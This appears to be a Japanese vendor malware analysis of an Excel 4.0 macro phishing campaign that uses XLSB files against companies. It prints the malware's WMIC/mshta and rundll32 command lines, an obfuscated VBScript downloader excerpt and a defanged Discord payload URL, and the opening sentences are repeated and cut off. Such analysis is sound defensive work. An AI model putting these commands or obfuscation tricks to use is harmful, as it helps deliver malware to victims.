ブラックフライデーシーズンを狙った不正な Excel ドキュメントが企業をターゲットに出回っている。11月25日付で確認された電子メールは、某企業から収集された。電子メールは Excel ドキュメントファイルを添付ファイルとして含んでいる。Excel ドキュメントファイルは XLSB Excel のバイナリフォーマットである Excel 4.0 Macro(XLM)マクロシートを確認された電子メールは、韓国国内の某企業から収集された。電子メールは Excel ドキュメントファイルを添付ファイルとして含んでいた。Excel ドキュメントは XLSB Excel のバイナリフォーマットである Excel 4.0 Macro(XLM)マクロシートを含むファイルで、実行対象システムのドメインコントローラ状況を確認して追加の不正な機能が動作する。

添付された Excel ドキュメントは、ファイル名が「promo details-[数字].xlsb」であり、XLSB ファイルのフォーマットであ添付された Excel ドキュメントは、ファイル名が「promo details-[数字].xlsb」であり、XLSB ファイルのフォーマットである点が特徴である。XLSB は Excel バイナリファイルフォーマットであり、従来の XLS または XLSX ファイルとは多少異なるファイル構造である。XLSX が String 基盤の XML ファイルであるとすれば(以下の図を参考)、XLSB は以下のように Hex バイナリで構成されている。よって、アンチウイルスによるファイルの特定ポイント検知、または解析者がコードを解釈するのがより困難になっている。XLSB ファイルフォーマットの不正なファイルは、今回初めて発見されたわけではない。しかし、これまでは XLS、XLSX ファイルフォーマットのほうがより多く、電子メールによって拡散していたため、今後の動向に注目しておく必要がある。


添付された Excel ドキュメントを開くと、以下のような画面が表示される。マクロの実行を有効可して画像をクリックすると、不正な機能が実行される。画像をクリックしないと不正な機能が実行されないのは、自動解析システム等を回避するためであると見られる。また、攻撃者はファイルの解析を困難にするため、Excel ドキュメントを「保護」している。有効なパスワードがあることでファイル内容の編集および非表示のマクロシートを確認できるため、マルウェアの製作がよりディテール化されたものと思われる。


画像をクリックすると実行される不正な機能は、以下の通りである。ProgramData パスに不正なファイルを生成し、これを WMIC によって実行する。生成される不正なファイルは VBScript ファイルであるが、RTF ファイルの拡張子に偽装している。また、mshta.exe のプロセスを利用してファイルを実行している。
Command line: wmic process call create “mshta C:\ProgramData\cbfyx.rtf” |

実行される VBScript は、以下のようなコード(一部)を含んでいる。主な機能は以下の通りである。
- Wscript.shell を利用したシステムの %USERDOMAIN%、%LOGONSERVER% 環境変数(Environment Variable)の確認 – ドメインコントローラへの接続を確認する目的
- ドメインコントローラへの接続が確認されなかった場合、以降の機能は実行されない
- ドメインコントローラへの接続が確認された場合、hxxps://cdn.discordapp.com/ <省略>に接続して不正な DLL ファイルをダウンロード
- ダウンロードされた不正な DLL ファイルは ProgramData パスに nianigger.bin というファイル名で生成される
- Rundll32.exe プロセスで不正な DLL ファイルを実行 C:\ProgramData\nianigger.bin DllRegisterServer
<script type="text/vbscript" LANGUAGE="VBScript" >
G_Q_w_i_Y_t_S_V_Y_W_n_K_s_i_F = "ru" & "" & Chr(110+1-1) & "dll" & "32." & "ex" & Chr(101+1-1) & Chr(32+1-1) & Chr(67+1-1) & ":\\" & Chr(80+1-1) & "ro" & Chr(103+1-1) & "ra" & "mDa" & "" & "ta\" & Chr(110+1-1) & "ian" & Chr(105+1-1) & "gge" & Chr(114+1-1) & ".bi" & "n D" & Chr(108+1-1) & "lR" & "egi" & "ste" & "rS" & "er" & "ve" & "" & Chr(114+1-1)
Set Q_o_b_k_v_e_J_u_V_s = CreateObject("" & "MSX" & "" & Chr(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & Chr(76+1-1) & "HT" & "TP." & "" & "" & "" & Chr(54+1-1) & Chr(46+1-1) & Chr(48+1-1))
H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = Chr(87+1-1) & "" & "scr" & Chr(105+1-1) & "" & "" & "" & "pt." & "Sh" & Chr(101+1-1) & "" & Chr(108+1-1) & "" & Chr(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = CreateObject(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
w_g_x_q_b_O_S_y_G_g_w_c = LCase(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings("%USERDOMAIN%"))
e_K_l_a_I_l_c_E_t =LCase(Replace(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings("%LOGONSERVER%"), CHR(92+1-1+1-1), ""))
Set q_h_H_U_O_o_S_q = CreateObject("" & "" & Chr(83+1-1) & "" & "cri" & "pt" & "ing" & Chr(46+1-1) & "" & Chr(70+1-1) & "ile" & Chr(83+1-1) & Chr(121+1-1) & "" & "ste" & "mOb" & "" & "je" & Chr(99+1-1) & Chr(116+1-1))
</script>
すなわち、今回確認された電子メールと不正な Excel ドキュメントは、企業をターゲットに配布と攻撃を試みようとするマルウェアである。ブラックフライデーシーズンだけでなく、今後も XLSB ファイルを利用した類似攻撃事例が更に頻繁に起きるものと予想される。
[ファイル検知]
Downloader/XLS.Generic
Trojan/Win.FJX
[ビヘイビア検知]
Execution/MDP.Behavior.M3819
[IOC]
9f27881dd96c57de0495bf609b954af5 (EML)
33411e3b8028fe4b8f9786b440d0b098 (EML)
f2c941b14d81c9b6b7a7aa6b98f91ce9 (XLSB)
e73d286a4915a3f62516a701f5ae9467 (XLSB)
ff330965e4d39788c99b9b9c6128983a (DLL)
hxxps://cdn[.]discordapp[.]com/attachments/912720368844824620/913069652077326346/KftJXyrZQyellowfacebrownietacohead.ogg
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報